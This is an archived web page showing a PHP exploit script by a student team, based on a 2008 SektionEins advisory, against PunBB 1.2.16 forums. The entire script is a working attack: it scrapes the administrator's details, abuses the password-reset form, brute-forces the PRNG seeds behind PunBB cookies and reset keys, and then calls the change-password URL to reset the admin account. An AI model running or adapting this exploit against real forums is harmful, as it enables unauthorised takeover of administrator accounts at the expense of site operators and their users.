goinfre/externals/080221-epibite-pwnbb/5165
goinfre/externals/080221-epibite-pwnbb/5165
_____________________________________________________________________________
/ / Index / Goinfre / Resume / Links / Contact / Sitemap / .: v0.6.1.0 |^|
|\__/-------+ +--------+-------+---------+---------+-----------------+#|
| 1| /goinfre/externals/080221-epibite-pwnbb/5165 |#|
| 2| ========================================== |#|
| 3| |#|
| 4| [ raw ] [ download ] |#|
| 5| ` `` ````````````````````` |#|
| 6| |#|
| 7| <?php |#|
| 8| /** |#|
| 9| * Original : http://sektioneins.de/advisories/SE-2008-01.txt |#|
| 10| * Thanks to Stefan Esser, here's the exploit. |#|
| 11| * |#|
| 12| * Team : EpiBite |#|
| 13| * firefox, petit-poney, thot |#|
| 14| * Nous tenons a remercier nos mamans et papas respectifs. |#|
| 15| * Let's get a fu*** coffee ! |#|
| 16| */ |#|
| 17| |#|
| 18| // conf |#|
| 19| define('URL', 'http://localhost/punbb_1-2-16_fr/upload'); // base |#|
| 20| url |#|
| 21| define('EMAIL', 'login_x@epitech.net'); // your |#|
| 22| email |#|
| 23| define('LOGIN', 'login_x'); // your login |#|
| 24| define('PASS', '620553.8I73'); // your |#|
| 25| pass |#|
| 26| // Exploit |#|
| 27| printf("--\nUrl : %s\nEmail : %s\n--\n", URL, EMAIL); |#|
| 28| $h = curl_init(); |#|
| 29| curl_setopt($h, CURLOPT_URL, |#|
| 30| URL.'/userlist.php?username=&show_group=-1&sort_by=registered&sort_dir |#|
| 31| =ASC&search=Envoyer'); |#|
| 32| curl_setopt($h, CURLOPT_RETURNTRANSFER, 1); |#|
| 33| $s = curl_exec($h); |#|
| 34| preg_match('/profile\.php\?id=([0-9]*)">([^<]*)</', $s, $m); |#|
| 35| define('ADMIN', $m[2]); |#|
| 36| preg_match('/<td class="tcr">([0-9]{4})-([0-9]{2})-([0-9]{2})<\/td/', |#|
| 37| $s, $m); |#|
| 38| if (count($m)) |#|
| 39| define('DATE', mktime(0, 0, 0, $m[2], $m[3], $m[1])); |#|
| 40| else |#|
| 41| define('DATE', time() - 86400); //just in case, the forum or account |#|
| 42| just has been created |#|
| 43| printf("Admin : %s\nDate : %s\n--\n", ADMIN, DATE); |#|
| 44| $h = curl_init(); |#|
| 45| curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=forget_2'); |#|
| 46| // curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128'); |#|
| 47| curl_setopt($h, CURLOPT_RETURNTRANSFER, 1); |#|
| 48| curl_setopt($h, CURLOPT_HEADER, 1); |#|
| 49| curl_setopt($h, CURLOPT_POST, 1); |#|
| 50| curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1', |#|
| 51| |#|
| 52| 'req_email='.urlencode(EMAIL), |#|
| 53| 'request_pass=Envoyer'))); |#|
| 54| preg_match('/mailto:([^"]*)"/', curl_exec($h), $m); |#|
| 55| define('ADMIN_MAIL', $m[1]); // Admin email (normally automatically |#|
| 56| get, set manually if there's problem) |#|
| 57| printf("Admin mail : %s\n--\n", ADMIN_MAIL); |#|
| 58| $h = curl_init(); |#|
| 59| curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=forget_2'); |#|
| 60| curl_setopt($h, CURLOPT_RETURNTRANSFER, 1); |#|
| 61| // curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128'); |#|
| 62| curl_setopt($h, CURLOPT_COOKIE, |#|
| 63| 'punbb_cookie='.rawurlencode(serialize(array(0 => 2, 1 => |#|
| 64| md5('bite'))))); |#|
| 65| curl_setopt($h, CURLOPT_HEADER, 1); |#|
| 66| curl_setopt($h, CURLOPT_POST, 1); |#|
| 67| curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1', |#|
| 68| |#|
| 69| 'req_email='.urlencode(ADMIN_MAIL), |#|
| 70| 'request_pass=Envoyer'))); |#|
| 71| $s = curl_exec($h); |#|
| 72| preg_match('/Set-Cookie:.*punbb_cookie=([^;]*)\;/', $s, $m); |#|
| 73| $c = unserialize(urldecode($m[1])); |#|
| 74| define('MD5_NOT_LOGGUED', $c[1]); |#|
| 75| printf("Md5 not loggued : %s\n--\n", MD5_NOT_LOGGUED); |#|
| 76| $h = curl_init(); |#|
| 77| curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=in'); |#|
| 78| curl_setopt($h, CURLOPT_RETURNTRANSFER, 1); |#|
| 79| curl_setopt($h, CURLOPT_HEADER, 1); |#|
| 80| // curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128'); |#|
| 81| curl_setopt($h, CURLOPT_POST, 1); |#|
| 82| curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1', |#|
| 83| 'redirect_url=index.php', |#|
| 84| 'req_username='.LOGIN, |#|
| 85| 'req_password='.PASS))); |#|
| 86| $s = curl_exec($h); |#|
| 87| preg_match('/Set-Cookie:.*punbb_cookie=([^;]*)\;/', $s, $m); |#|
| 88| $c = unserialize(urldecode($m[1])); |#|
| 89| define('MD5_LOGGUED', $c[1]); |#|
| 90| printf("Md5 loggued : %s\n--\n", MD5_LOGGUED); |#|
| 91| define('PASS_MD5ED', sha1(PASS)); |#|
| 92| $chars = array('/', '-', "\\", '|'); | |
| 93| for ($p = 0; $p < 86400 * 2; $p++) | |
| 94| { | |
| 95| if (!($p % 300)) | |
| 96| echo $chars[($p / 300) % 4]."\r"; | |
| 97| if (strcmp(MD5_LOGGUED, md5(substr(md5((int)(DATE + $p)), | |
| 98| -8).PASS_MD5ED)) == 0) | |
| 99| { | |
|100| define('SEED', substr(md5(DATE + $p), -8)); | |
|101| break; | |
|102| } | |
|103| } | |
|104| printf("Seed : %s\n--\n", SEED); | |
|105| for ($p = 0; $p < 1000000; $p++) | |
|106| { | |
|107| if (!($p % 300)) | |
|108| echo $chars[($p / 300) % 4]."\r"; | |
|109| mt_srand((double)$p); | |
|110| if (strcmp(md5(SEED.random_pass(8)), MD5_NOT_LOGGUED) == 0) | |
|111| { | |
|112| define('SRAND', $p); | |
|113| break; | |
|114| } | |
|115| } | |
|116| printf("SRAND : %s\n--\n", SRAND); | |
|117| mt_srand(SRAND); | |
|118| random_pass(8); | |
|119| printf("New password : %s\n--\n", random_pass(8)); | |
|120| $url = | |
|121| URL.'/profile.php?id=2&action=change_pass&key='.random_pass(8);// Id | |
|122| is set to '2' (the admin's id, but you can change your target) | |
|123| $h = curl_init(); | |
|124| curl_setopt($h, CURLOPT_URL, $url); | |
|125| curl_setopt($h, CURLOPT_RETURNTRANSFER, 1); | |
|126| curl_exec($h); | |
|127| function random_pass($len) | |
|128| { | |
|129| $chars = | |
|130| 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; | |
|131| $password = ''; | |
|132| for ($i = 0; $i < $len; ++$i) | |
|133| $password .= substr($chars, (mt_rand() % strlen($chars)), 1); | |
|134| return $password; | |
|135| } | |
|136| | |
+---+ | |
\_ \______ mo5.so - normal - 1337.so - rev.so - video_r.so +---------------+ |
|__ \_____ plain.so - color.so - comment.so / moul 2008 (c) |V|
\-----\______\________________________________________/-----------------+-+